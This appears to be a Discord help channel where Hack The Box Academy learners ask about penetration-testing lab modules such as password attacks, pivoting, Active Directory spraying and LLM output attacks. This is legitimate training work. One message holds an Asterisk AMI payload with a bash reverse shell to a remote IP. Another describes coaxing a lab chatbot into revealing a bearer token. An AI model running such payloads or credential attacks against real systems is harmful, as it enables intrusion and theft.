#modules

1 messages · Page 428 of 1

opal shuttle
#

help me

opal cape
#

can you please hurry up then?.. lol jk

#

i can try, which part exactly

opal shuttle
opal cape
#

ok

dark yarrow
#

Im on last module called learning progress im stuck on last question where it compares 2 sets of numbers and asks what's the difference i need assistance anyone have a clue thank you

red plover
#

Guys, can someone help me ?

#

I really need a help

dark yarrow
#

37.7-1.00

red plover
#

Hmmmm, i've already run mimikatz and dont return any functional for ms01

#

I run lsass attack and sam but nothing who will take me to admin on ms01

opal cape
#

Anyone manage to finish the Attacking Wordpress module?

twilit narwhal
#

Hy everyone. Can't solve the RDP question in academy https://academy.hackthebox.com/module/147/section/1327
Found login and pass but xfreerdp doesn't work. i tried this command with and without /cert:ignore /dynamic-resolution:
xfreerdp /v:10.129.202.136 /u:'xxxx' /p:'xxxxxxxx'

I'm getting this:
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) Y
[12:50:53:784] [42421:42448] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[12:50:53:784] [42421:42448] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[12:50:54:401] [42421:42448] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[12:50:54:401] [42421:42448] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[12:50:54:401] [42421:42448] [ERROR][com.freerdp.core] - freerdp_post_connect failed

I also tried remmina, didn't work either

frosty crescent
little magnet
#

Hello, is there someone who can help me with the module Password Attacks -> Pass the Certificate. I have a problem with the last part of first exercise - cannot connect to the victim through evil-winrm. I configured krb5, /etc/hosts, can ping dc01 but the command doesnt work:

└─$ evil-winrm -i dc01.inlanefreight.local -r INLANEFREIGHT.LOCAL

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
Cannot contact any KDC for realm 'INLANEFREIGHT.LOCAL' Error: Exiting with code 1

I will appreciate somebody's time

twilit narwhal
#

this what i get with following command xfreerdp /v:10.129.202.136 /u:'xxxx' /p:'xxxxxxxx' +auth-only

[13:08:07:825] [69041:69042] [INFO][com.freerdp.client.x11] - Authentication only. Don't connect to X.
[13:08:09:354] [69041:69042] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[13:08:09:354] [69041:69042] [WARN][com.freerdp.crypto] - CN = WINSRV
[13:08:09:655] [69041:69042] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[13:08:09:655] [69041:69042] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[13:08:09:655] [69041:69042] [ERROR][com.freerdp.core] - Authentication only, exit status 1

tropic trout
#

I'm trying to finish the medium lab for the footprinting module but I can't seem to get the flag correct.. I found the HTB password in the SQL Management Studio table and it still says it's incorrect

#

I used this for that part:

xfreerdp3 /u:xxxxx /p:'xxxxx' /v:10.129.135.38
#

Are you doing that for the RDP section or the medium lab?

rustic sage
#

hi guys! i am trying to find Mark's password in this section Password Attacks, Page 5, Writing Custom Wordlists and Rules, but i havent understood how i am supposed to rip his OSINT info for a wordlist.. can anyone help me out?

https://academy.hackthebox.com/module/147/section/1391

cloud urchin
frosty crescent
tropic trout
dusty lark
#

What is the 3rd most used word on the exercise target website?

#

Please help

tropic trout
#

I even looked up write ups, and they did the same thing... but the question says it's incorrect on HTB

dusty lark
#

Module Introduction to python3

tropic trout
tropic trout
#

I really hate fonts that make l and I look the same...

dusty lark
#

What is the answer?

tropic trout
#

Apperantly MSSQL Server Management Studio makes them look like that for the password query

cloud urchin
#

You won't learn anything by doing that

dusty lark
#

I couldn't find it bro

cloud urchin
#

right, so ask how to find it rather than what the answer is

crystal ridge
#

Nb

celest peak
#

Just did AEN semi-blind, only looked up few things for a sanity check prayge

#

10/10 feel prepared for the exam

celest peak
opal cape
#

thats not an option

celest peak
#

Nineteen worked for me, make sure it's disabled when editing

opal cape
#

oh wait how do you disable them

#

W

opal cape
#

👍

#

when i try to visit it says page not respnding

#

do i have to manually add this page ?

#

NVM i got it

cloud urchin
#

you should probably take this to DM's are you're revealing a lot for a skill assessment

twilit narwhal
fathom pendant
#

-t is threads, not tasks

#

lowering the threads means less bombardment of a service

twilit narwhal
#

it makes sense. thank you for explanation

fleet charm
#

Thank you again. This issue was a code pebcak. I was using the wrong addresses 🙂

cloud urchin
#

@grand compass No. This is not a hacker for hire server and we don't condone illegal activities.

grand compass
#

Okay just trying to find someone who’ll help

marsh fulcrum
#

were you able to make it work?

scenic current
#

I'm in a similar place. I found a authorization bearer token. I got AdminBot to give me a ready-to-use string version of it. But I've been getting invalid key with both and encoded versions of either. Even tried to package it in JSON. No luck. Have you found out more?

modern iris
#

Have a question regarding the PenTest Getting Started Knowledge check. Comments and some walkthroughs mention looking at GTFOBins once the /usr/bin/php is found after checking sudo permissions. Q: When did they decide to look at GTFOBins?

safe star
#

I’ve only done the beginning but can’t spoil content on modules over tier 0, so dm

crimson leaf
modern iris
#

@crimson leaf Thank you for the insight.

celest peak
#

Also in addition, a common resource for Windows world to look at is lolbas

jolly oasis
#

Is anyone available to have a look at my Burp Intruder payload attempt for "Skills Assessment - Using Web Proxies" question #3? I'm doing the two encoding methods in the correct order (at least I think I am). But the response I'm getting is a 404.

scenic current
#

Has anyone completed the final assessment for LLM Output Attacks?I've been on it for 10 hours straight. I have 2 different authentication strings(assuming one of them isn't a LLM hallucination), but haven't been able to do anything with either of them (even with encodings). I could really use some advice! With fond regards, Exhausted-And-Collapsed-on-the-Threshold. 😅

jolly oasis
pine knot
#

Hi , what modules in HTB should I learn for binary exploitation ?!

cloud urchin
opal cape
#

hey in Tomcat - Discovery & Enumeration i keep getting a 404 when trying to go to /webapps/WEB-INF/web.xml

#

i added the vhost to /etc/hosts already

#

i can reach /docs no problem

cloud urchin
#

404 means the page could not be found, not a dns error

opal cape
#

am i missing a step?

#

right

#

but why cant i access that if i can access /docs

cloud urchin
#

a 404 error from a webserver means the resource you are visiting is not there

opal cape
#

but the question is asking for me to find the user admin's role and so i must access the web.xml

#

and based on the module the map of tomcat says the web.xml is always in the /webapps/WEB-INF directory

#

im not at all asking for the answer, just advice on where im going wrong/missing a step?

#

oh wait

#

lol im looking for the wrong file

#

my bad

#

wait but i still need the web.xml to know the servlet that is associated with admin

jolly oasis
gentle fog
#

anyone who wants to team for the CPTS prep?

opal cape
#

but im not done with course, are you? i got 4 modules left

#

i'll DM u

#

@fathom pendant do you have a moment?

fathom pendant
#

sorry caps lock was on

jolly oasis
opal cape
fathom pendant
#

it helps to know the module name

#

but i'm also busy playing games

opal cape
#

Tomcat - Discovery & Enumeration

#

in Attacking Common Applications

fathom pendant
#

i don't recall having many issues getting the info it asked for

opal cape
#

im able to access /docs

#

got the version number

hollow ledge
#

Yo what's the meaning of Ports and what's an open port

opal cape
#

@fathom pendant but im trying to get admin role which needs access to /WEB-INF correct? This is still enumeration not yet attacking yet.

opal cape
sour pasture
#

👋Welcome

jolly oasis
#

Anyone on that's finished "Skills Assessment - Using Web Proxies" question #3?

fathom pendant
#

As a general note though @opal cape if you continue to ping me like that I will end up blocking you

tropic trout
#

I have a question regarding the timeline for modules. When it says it will take an average of 2 days to complete, what does that translate to in actual average hours spent on the module?

#

Asking for possible CEUs

fathom pendant
tropic trout
#

Got it so like 8 hours then per day?

fathom pendant
#

Also i don't think HTB does CEUs, ik that they do CPEs

tropic trout
#

I was just going to add it through CompTIA, they just want you to do seminars/trainings and add that you did it manually. I am tracking that ISC2 automated that process with HTB

fathom pendant
#

There's no guarantee that comptia will accept it

opal cape
#

so if we see a mod online, we shouldnt @ them? we just ask question and wait? is that correct?

fathom pendant
opal cape
#

ok ok

tropic trout
#

CompTIA is pretty odd with how they accept CEUs, I know I was able to add my Air Force training for all my required CEUs, and there's barely any proof you need to provide besides saying you did it in a document.

#

They do audits, but I've never heard of something being audited by them

#

I would say that these modules relate with PenTest+ so I don't get why they would have a problem with it

fathom pendant
#

The only time it's ok to random ping mods is for server related issues i.e. someone spamming the channels. And even then, that's what the seriousrulebreak ping is for

marsh peak
#

Hi guys

#

I need some help if you don't mind

#

I'm stuck for real

stuck hollow
marsh peak
#

password attacks

tropic trout
fathom pendant
marsh peak
#

generatign custom wordlists

fathom pendant
#

that section is a bit interesting, but you have all the keywords and info

#

And a link to how hashcat processes wordlists

marsh peak
#

still, I generated tens of wordlists and used differents rules but none of them worked

fathom pendant
#

Use simple rules also make sure every entry starts with a capital letter

#

You can write your own custom rules list

#

The base wordlist is simple, just all the keywords from what you're given

marsh peak
#

using cupp?

#

or crunch?

fathom pendant
#

Cupp isn't needed

#

Neither is crunch

#

You can just write a wordlist.txt file

#

Then your custom rules should be written to take into account potential common ways to end passwords

stuck hollow
fathom pendant
#

Like throwing a !, or a <year> or a <year>! At the end

#

The link to the hashcat page on how to write rules is really helpful to get it working properly

#

If you wanna get fancy, figure out a way to filter out all the passwords that aren't at least 12 characters long

marsh peak
#

Thanks

last ermine
#

u need to use autorun

#

also try to stay away from proxychains

#

it sucks so much

#

i dont know which question ur on, but proxychains works at the start.

#

just dm me, ill show u

last ermine
last ermine
fathom pendant
#

Also in future still redact answer fields

#

I don't know what answer you're expecting tbh. But as far as the erratum stuff goes; if it's not a general Skill Issue ™️ then I don't really bother with responding

hard tree
#

Hello everyone does anyone here know which Setting I need to enable in ZAP to edit like in the image provided?

scenic current
#

Has anyone completed the final assessment for LLM Output Attacks?I've been on it since 5am and it's now 5pm and I still... can't... let... go... 😜 I have 2 different authentication strings(assuming one of them isn't a LLM hallucination), but haven't been able to do anything with either of them (even with encodings). I could really use some advice! With fond regards, Stranded PromptPhantom. 😅

rustic jolt
#

Hey anyone knows how to get a revershell from Asterisk AMI. I tried creating extension and executing it. Didn’t work

‘’’Action: UpdateConfig
SrcFilename: extensions.conf
DstFilename: extensions.conf

Action-000000: NewCat
Cat-000000: hackbox2

Action-000001: Append
Cat-000001: hackbox2
Var-000001: exten
Value-000001: 1009,1,System(bash -i >& /dev/tcp/192.168.100.93/443 0>&1)’’’

cloud urchin
rustic jolt
cloud urchin
rustic jolt
#

i got no access

cloud urchin
stuck hollow
#

hey, im getting this error "Cannot find path 'C:\Tools-' because it does not exist..Exception" when running Invoke-DomainPasswordSpray on module Active Directory Enumeration & Attacks section Internal Password Spraying - from Windows. Any solution?

cloud urchin
#

that's a very straightforward answer. it says it can't find that directory. did you accidentally add a - after tools or are you trying to run from c:\tools-?

stuck hollow
#

is this expecting a userlist? cause i have one with 2900 usernames and nothing happened

steep forum
stuck hollow
#

already did... now is giving me a lot of false positive

#

well.. that section isnt working well ... i already made as solution said and gave 3 user false positive, and using a list with the correct username didnt show it as success

cloud urchin
#

The module itself is a guide

hollow ledge
#

Yo i wanna start ethical hacking and i know nothing. Plz help

stuck hollow
drifting dew
silent ivy
compact patrolBOT
silent ivy
#

And that ^

junior fjord
#

Hey learner's, I am stuck on Attacking common services - medium

Didn't get any entry point please give me some hint

#

I am trying it since yesterday

daring charm
#

Hey guys. I need some help. I'm working on network services in the Password Attack Module. It's taking forever on my machine via the vpn to crack the username and password especially using the netexec command. How do I get to use the networkresources.zip files in the pawnbox? It's suggested that using them in pawnbox will take lesser time.

sour badge
#

Hello, my name is Yasmin, I currently use Parrot OS Home🦜 Linux I would like you to recommend some courses or tutorials on YouTube, thank you.

cloud urchin
sinful cedar
#

HELLO is there anyone from help center? I still haven't got an email and reply from help center yet . I mistakenly subscribed silver plan .Can anyone help me?

steep forum
sinful cedar
#

Will they refund me?

#

It has been 2 days already

cloud urchin
# sinful cedar Will they refund me?

As 0daybug said, support is not provided over discord. No one here can help you. It's the weekend, there is only limited support. Be patient and they'll get back to you.

sinful cedar
#

Oh I see. Thanks for answering.

steep forum
#

For this section: https://academy.hackthebox.com/module/57/section/498, I ran the script for all 10,000 pins with no results. I also tried the supposedly correct pin manually in the url, and I still got the "Incorrect Pin!" result. A reset did not help; has anyone else experienced this?

storm elk
royal bay
#

Doing Pivoting,Tunnelling & Port forwarding section with Chisel as sub topic. Able to connect to pivot host as well as attack Host but when I try to run xfreeRDP using proxychains I get socket error or timeoutr message. Please help

#

I have tried several times and still it does not get connected but keeps on giving socket error

steep forum
junior fjord
warped rivet
#

Good morning everyone, i have a question about the module "password Attacks" -> Writing Custom Wordlists and Rules

#

i've tried ALOT already but my hashcat seems getting exhausted with my custom wordlists i made & rule set

fathom pendant
junior fjord
fathom pendant
#

don't call me sir

#

the same question appplies to hard if you're stuck at a foothold

steep forum
#

That might break the TOS.

fathom pendant
#

you don't need to use another user's rule llist

warped rivet
#

it's a complete hashcat list

#

mine didn't do the trick, but oh well found it

fathom pendant
#

you can write a very simple one that'd do the trick

#

you likely just didn't add something very simple to the list :P but it can be done with like a handful of rules

warped rivet
fathom pendant
#

since you already got it you can dm me with your custom.rule and i can see if i can tell you where you went wrong

warped rivet
#

One of my colleagues just popped me that github link & ngl it's very nice to have these rule sets

fathom pendant
#

it's good to know how to write them just in case

#

@zealous portal this isn't that kind of server.

zealous portal
fathom pendant
# zealous portal Hey, no worries — I understand this might not be the right place. But just wond...

this server has plenty of resources, and definitely supports people in learning. But not in the way that you are looking for. I suggest reading #welcome to learn what this server is about, there's plenty of free stuff out there on HackTheBox so you don't have to pay anything. And there's a #resources-tools channel where people share various different links to (generally) free tools and such to help others

zealous portal
fathom pendant
#

in the short term though: looking for handouts will generally get you pushed away from many communities as they'll see it as you just trying to gain stuff without doing anything

dense hearth
#

Hi, Anyone available for a sanity check for the module Windows Lateral Movement -> WinRM? I managed to get the last question, but I would Ike to verify if I did in the intended way. Thanks

river grove
#

I would really appreciate a nudge for Client-Side Prototype Pollution. Are we not supposed to be able to read this script? ||prototypes.htb/devscript.js||

north bramble
#
  • 20 What's the password of the account you found?
    Have any of you finished Using CME module? Its on CAPE path, but I am doing it as extra for CPTS.

I am stuck on the first question. looks like SMB null auth is disabled. tried --users --rid-brute. both didnt work. can anyone help?

fathom pendant
#

you don't really need to do anything outside the CPTS path for CPTS

#

it also helps if you say what section you're on

north bramble
fathom pendant
#

yeah the instructions start you off with telling you you need to connect to the internal proxy network using chisel

north bramble
#

I see. okay. I will give that a try. Thanks

fathom pendant
#

steps to connect to the target environment

torn pumice
#

what are you doing dude

waxen totem
#

@fathom pendant you still active so you can deal with this?

craggy edge
#

I'm sorry if this question was asked before, but did any of the password attack module sections got changed, that aren't entirely new? By that I mean, did the content of some of them changed but still get shown as completed for people that already completed the module before? Or just hte new sections and that's it?

waxen totem
craggy edge
#

this is why you don't do drugs kids

fathom pendant
fathom pendant
#

i believe the module should have a changelog

#

ah nvm the changelog only states "module v2 released"

craggy edge
fathom pendant
#

yeah

#

useful changelog, very nice xD

fathom pendant
#

i haven't fully dissected the module to update my notes i kinda only skimmed through for completion

spring island
#

password attack module is killing me PKINIT having oscrypto issues in pwnbox should it work on fresh pwnbox if i just git clone and run it or am i meant to be resolving oscrypto issues?

fathom pendant
#

@spring island

north bramble
fathom pendant
#

also make sure you have the proxychains config set properly

north bramble
fathom pendant
#

first step is finding out the devices on the network :)

#

remember you're tasked with attacking the internal 172.16.15.0/24 network, so it won't be against the spawned target

north bramble
fathom pendant
#

well proxychains generally dislikes icmp; but you can do a range with nxc

#

just specify the network/cidr instead of just ip

north bramble
fathom pendant
#

yep

sacred rock
north bramble
# fathom pendant yep

Refuses to work

└─$ proxychains nmap -p445 --open -n -T4 172.16.15.0/24
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-23 14:28 IST
Nmap done: 256 IP addresses (256 hosts up) scanned in 28.10 seconds

even tried nmap to find any valid ip. Proxychains + nxc doesnt even work.

spring island
#

the --force-reinstall seemed to have fixed it on pwnbox thank you can get passed that step now 🙏

waxen totem
cyan pagoda
#

Hey i am in the setting up module in the Linux section and I am new to this field i have set up the ParrotOS VM but its giving me commands that i dont understand like to update things and install things is that ok or i am supposed to already undertstnad?

fathom pendant
cyan pagoda
fathom pendant
#

the main thing you need to know is that sudo apt install <some package here> is used to install packages, if you have a large list of tools
sudo apt install $(cat tools.list | tr "\n" " ") -y
$() is a bash construct that says "run whatever is in here before processing the rest of the first command"

#

so the $(cat tools.list | tr "\n" " ") part is saying read the file (tools .list) and translate (tr) every new-line (\n) to spaces " " so that a list like

one
two
three
four

turns into

one two three four

so it can be properly read by apt
the -y is just "assume yes whenever it asks questions"

fathom pendant
#

you can throw the command at chatGPT and just say "explain <command>" and it explains it fairly decently

#

here is the GPT explanation (Which i guess is close to mine):
The command you're asking about is a combination of shell utilities used in a Unix-like operating system (such as Linux) to install packages listed in a file. Let's break it down:

Command:

sudo apt install $(cat tools.list | tr "\n" " ") -y

Breakdown:

  1. sudo:
    • This is used to run commands with superuser (root) privileges. You typically need sudo to install software or make system-wide changes.
  2. apt install:
    • This part tells the system to install software packages. apt is a package manager for Debian-based distributions (like Ubuntu)
  3. $(...) (Command Substitution):
    • This syntax is used to run a command and substitute its output into the main command. In this case, whatever the cat tools.list | tr "\n" " " command outputs will be inserted here
  4. cat tools.list:
    • cat is used to display the contents of the file tools.list. This file presumably contains a list of package names, one per line.
  5. tr "\n" " ":
    • The tr command is used to translate or delete characters. In this case, tr is replacing all newline characters (\n) with spaces (" "). This converts the list of package names (one per line) into a single line of space-separated package names.
  6. -y:
    • The -y flag automatically answers "yes" to all prompts during the installation process. This is useful when you don't want to manually confirm the installation of each package.
      Example:
      Let’s say tools.list contains the following:
curl
git
vim
htop

The command would first execute cat tools.list, which outputs:

curl
git
vim
htop

Then, tr "\n" " " will transform this into:

curl git vim htop

Finally, the entire command becomes:

sudo apt install curl git vim htop -y

This installs curl, git, vim, and htop all at once, and the -y flag ensures that you won't be prompted for confirmation during the installation.
In Summary:
This command is a convenient way to install multiple packages listed in a file (tools.list) with one command, automatically confirming all prompts.

cyan pagoda
#

but the thing is I dont understand the commands themselves and how to use them so will this module be able to teach me it?

fathom pendant
#

you will run into cases in higher tier modules where you may need to install a tool but the syntax is generally always given to copy/paste

#

the module itself encourages external research of some of the commands it presents in order to get a better grasp of how to do things

cyan pagoda
#

alr then thx

spring island
#

holy moly "pass the certificate" was rough thanks for the fix finished it now but many hours wasted before coming to discord, lesson learnt for next time

faint hamlet
regal ridge
#

someone?

queen lion
#

Did you guys solve artificial machine

#

On the season 8

fathom pendant
queen lion
#

Can anyone help me out

fathom pendant
#

this channel is for help with academy modules, not with the machines on the main platform

#

remove the -n

#

also the module is above tier 0; so avoid posting spoilers like that

regal ridge
cyan pagoda
#

Does it mean by trial machine like its either i get a product activation key or i need to make a new windows vm every 90 days?

fathom pendant
cyan pagoda
fathom pendant
#

in a vm

#

it's meant to be a vm

grizzled schooner
#

Hey Marcie, I'm still stuck on that PW Attacks module... I can't find anything tied to LINUX01$ --> Genuinely getting frustrated, do you think you could give me another nudge? I can't find anything with realm etc, but I'm also feeling borderline stupid

grizzled schooner
#

Yeah, I know that there's a keytab file there, but no matter what I had tried, I couldn't crack that... Is it not that file?

gloomy grail
#

Hello guys, I am having some issues with HTTP Response Splitting exercise in the academy. I have a working XSS through target request, but I dont understand how to trigger xss on the admin. Can someone DM me?

untold orbit
#

Hi Guys,
Just started the CPTS journey.
I am doing Getting Started module. After spawning the target machine, i am running some scans and enumeration. But the http request times out very often. It works for some time and then it again times out. Any suggestion to make this journey smooth??

fathom pendant
fathom pendant
untold orbit
grizzled schooner
young sentinel
#

So I am in the middile of HTB Linux Fundementals and I am trying to touch and mkdir. I am using Kali in a vbox, info so you can kind of guess where I am at. SO when I try touch and mkdir it says I don't have permissions. I am in the nixfund from the previous modules. Do I just have to be out of nix or should it work there too? If I confused you, you ain't the only one.

prisma wing
#

lol i'm in now! 20 attemtps later... but if someone can explain the issue, i'd be very much appreciative

boreal vessel
#

I need some help with Pass The Certificate.
https://academy.hackthebox.com/module/147/section/1335

I have managed to get jpinkman ccache, however unable to proceed further.

evil-winrm hits an error:

$ evil-winrm -i dc01.inlanefreight.local -r inlanefreight.local

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: User is not needed for Kerberos auth. Ticket will be used

Info: Establishing connection to remote endpoint

Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
Cannot find KDC for realm "INLANEFREIGHT.LOCAL"
Error: Exiting with code 1

I have my etc hosts file set with the domain and DC IP:

$ cat /etc/hosts
10.129.234.174 dc01.inlanefreight.local inlanefreight.local dc01
10.129.234.172 ca01.inlanefreight.local ca01

etc krb5 config file:

$ cat /etc/krb5.conf
[libdefaults]
default_realm = inlanefreight.local
.................
[realms]
inlanefreight.local = {
kdc = dc01.inlanefreight.local
admin_server = dc01.inlanefreight.local
}
................

appreciate any help with this..

glacial remnant
#

just completed the Password Attacks final. if anyone else completed i would love to know others attack path on this one. i did a few things not covered in this section and not sure if it was possible without a fair amount of tunnels.

#

also of course would prefer a DM to avoid spoilers 🙂

sacred rock
boreal vessel
sacred rock
#

Try edit this line default_realm = inlanefreight.local to default_realm = INLANEFREIGHT.LOCAL

glossy locust
#

I uploaded a web shell successfully, and I received the response:
File successfully uploaded.

But when I try to access it via the path, I can't find the file or it doesn't execute.

This is part of the "File Upload Attacks – Blacklist Filters" section.

boreal vessel
sacred rock
glossy locust
sacred rock
#

You are the one who sets the file name, so if the file name is test.php, it will be uploaded to /profile_pictures/test.php , if not, upload it again.

celest peak
ancient parrot
#

hi guys, i'm stuck at new update Password Attacks- Credential Hunting in Network Shares, it hard to find domain admin pass :v i found some fake pass,... in share like .pdf, txt, csv, docx ps1.... anyhint? thanks

gray yacht
ancient parrot
#

i found lots of fake pass

gray yacht
simple socket
#

Hello the community, I am stuck at the "XPath - Blind Exploitation" And extracted the XML structure as

    <acc>
        <username></username>
        <password></password>
    </acc>
</accounts>
#

But when I try to extract the content of the password I got nothing adm'+or+substring(name(/accounts/acc/password/text()),1,1)=1+and+'1'='1

ancient parrot
#

sure but is someone deleted my file? sadglas

simple socket
#

If someone have a hint

#

thanks

gray yacht
prisma wing
ancient parrot
prime stream
#

How to access to general

gray yacht
ancient parrot
gray yacht
jolly oasis
#

Good morning all, is anyone available to help with :
"Skills Assessment - Using Web Proxies" question #3: Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)

I think I have Intruder and my encoding set up correctly. Happy to share screenshots privately to avoid spoilers. Nothing stands out in my response lengths so I don't think I have it figured out yet. Been stuck on this one for a couple days.

Thanks to an amazing community contributor, we got there! Thank you!

gray yacht
clear seal
#

When you’re Kali vm crashes and you scramble to get the cherry tree file with all your notes….

jolly oasis
simple socket
scenic current
#

Has anyone completed the final assessment for LLM Output Attacks? I have 2 different authentication strings (assuming one of them isn't a LLM hallucination), but haven't been able to do anything with them yet (even with encodings). I could really use some advice! With fond regards, Stranded AI-Ninja-wannabe.

fierce sable
#

does anybody comleted Password Attack: Pass the Certificate Needed some Help!!!

reef sonnet
#

anyone got a nudge for Attacking Common Services - Hard?
i ve got the final flag but it doesnt accept. Wondering if i did it wrong or something

gray yacht
forest tendon
#

I have a question from the seniors here ! i'm having trouble grasping the full concept of windows registry, like what sort of information does registry store?

thorny karma
#

im doing the passwords attacks' skill assessment can someone guide me on where to start or just a small hint would be helpful

gray yacht
thorny karma
#

should i start by enumerating the given target the one that get spawned or the other 4

gray yacht
wooden bridge
#

Hey guys can I ask a question here?

#

about a task in linux fundamentals

civic estuary
#

Hi guys, would very much appreciate any help on the module "Password Attacks - Writing Custom Wordlists and Rules".

Does my password list all have to be at least 12 characters long? Im not sure how to proceed any help would be nice 😄

heady bane
#

What is the name of the function that returns the string inside the cpp file? (Format: FunctionName()).

does any one know the answer to this ?

subtle bay
#

Hey I can't seem to message in the general channel. Why is that?

waxen totem
ancient parrot
#

lol @gray yacht , i probably because i worked for a long time maybe i was dizzy so i missed the file my query easily caught it from the first moment i ignored it. after a little rest maybe i was fine and saw it prayge

gray yacht
thorny karma
#

i managed to ssh into the user , got the bash history found another uer's creds but when i try to ssh to it it doesn't even resolve even when they are within the same ip subnet

gray yacht
tropic wind
#

I'm feeling stuck starting medium footprinting, I've attempted to mount to the folder but was denied so i tried spoofing UID which didn't work because they were hidden. rpcclient doesnt allow unknown login so I'm not sure where to go

wooden bridge
#

I guess I'm good to ask a question, so in linux fundamentals there is a task "Submit the full path of the "xxd" binary. " . I already solved it by which, but when I try to solve it by using locate, I see other PATHs too, and the question arises, what do other xxds do and why hack the box only requires "/usr/bin/xxd" this path and not for example this path "/snap/core/10126/usr/bin/xxd"

ancient parrot
#

i got same problem too, you can try to access with root on VM

tropic wind
ancient parrot
#

just simple sudo -i then you go there by cd FeelsBadMan

tropic wind
#

ahhh thank you

nova pecan
#

Hey everyone, I am currently stuck on question 6 from the Pass The Hash module in the CPTS course. I am unable to catch the reverse shell from the DC. I have tried everything. Would anyone be able to help?

ancient parrot
#

try another port and dont forget listening nc.exe

nova pecan
#

yeah im using a base64 powershell encoded payload over port 8001. listening via nc on the rdpclient MS01

fathom pendant
fathom pendant
fathom pendant
nova pecan
fathom pendant
#

but for another it's likely how the payload gets processed in cmd vs powershell

nova pecan
fathom pendant
#

wrong; the payload invokes powershell

nova pecan
#

isnt that essentially what i just said..

fathom pendant
#

nope

#

invoking powershell isn't the same as using powershell

#

i.e. in zsh you can invoke a bash command with bash -c "insert commands here"

nova pecan
#

ok well my apologies for not using the correct verbiage

haughty tree
#

Is there a way to know which sections have been updated in a module that has been updated? It's been a while since I've done password attacks

#

perhaps I should just go over everything again

fathom pendant
haughty tree
thin wadi
#

did you find the correct input? i am at exactly the same situation.

fathom pendant
#

also it's not a bug per-se it's just how things on the backend work

#

many such /feedback have been submitted

haughty tree
#

I mean it shouldn't be the desired behaviour there are better ways to adress that

fathom pendant
silent falcon
#

i can't rdp to lab machine in Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows From active directory module in cpts path.

forest tendon
#

@fathom pendant Sorry to tag you ! I wanted to know wether there are machines for students who have completed the "Introduction to windows cli" module?

fathom pendant
forest tendon
#

thank you ! Although i see that most of the machines are connected to the multiple modules does it mean i will have to complete those modules as well?

fathom pendant
#

generally speaking yes; the fundamental modules really don't prep you to be ready for many of the machines as a lot of the retired machines require some form of attack vector to even land on the machine in the first place

forest tendon
#

got it ! Study more xD thanks

junior fjord
# fathom pendant don't call me sir

Sorry boss ! 🤝

Need one more help I reached pivoting module ( m 11 ) in CPTS and till now there are 7 questions from different skill assessment and excercises which I don't able to complete after going crazy ! 🤯

Please anyone help me to complete them !

sacred rock
sacred rock
thin wadi
sacred rock
#

Maybe the - character wasn't exactly the same. Regardless, now works with slashes too.

thin wadi
#

yeah, just to mention it got accepted on US format MM/DD/YYYY if that is helpful to others

sacred rock
thin wadi
#

ikr, anyways, thanks for jumpin in i appreciate it

daring charm
#

Hey guys. I need some help. I'm working on network services in the Password Attack Module. It's taking forever on my machine via the vpn to crack the username and password especially using the netexec command. How do I get to use the networkresources.zip files in the pawnbox? It's suggested that using them in pawnbox will take lesser time.

sacred rock
daring charm
#

Thank you. I wanted to know whether there's a way I can use the resources inside the pawnbox instead of my own machine through a vpn connection.

sacred rock
#

just download it with wget, followed by the link

marsh fulcrum
#

can anyone give me a sanity check on skill assesment for advanced XSS and csrf exploitation? ||I Was able to send a payload that fetches the admin.php and sends the response to my server, when I click I can see the XSS working, but no other user is clicking, should any moderator or admin click it?||

daring charm
full wagon
#

Hacking wordpress - Login: "Search for "WordPress xmlrpc attacks" and find out how to use it to execute all method calls. Enter the number of possible method calls of your target as the answer."

Not sure what this question even mean and even less why it's here. Anyways, I want to do the whole module and earn my cubes, so I have to pass it. And also I'm kind of that person that wants to clear things and not skip things. I like the feeling of "being done" and not simply skipping and giving up.

But tbh, I'm not learning anyting from this, just makes me frustrated. Sorry, but this kind of questions are just silly and doesn't contribute to the overall experience. So please, just help me move on.

frozen anchor
#

I just wanna be safe. And i am really scared, thatswhy I am looking for some to help me

frozen anchor
#

I dont mean to do search help for illegal things

tall pine
#

Somebody here who wants to check the new season machine ? Im ready :)!

have a good day ❤️

frozen anchor
frozen anchor
#

For my situation

#

Okay, thank you

tall pine
#

Where can i look for a team ? 🙂 or maybe some people who are often online 🙂

tall pine
#

no permissions 😄

gray yacht
tall pine
#

got it, thy buddy

formal arch
#

Hi everyone,

I'm trying to request a TGT using the gettgtpkinit.py script from the PKINITtools on Hack The Box. I have a valid PFX certificate in Base64 format and I run the command like this:

#

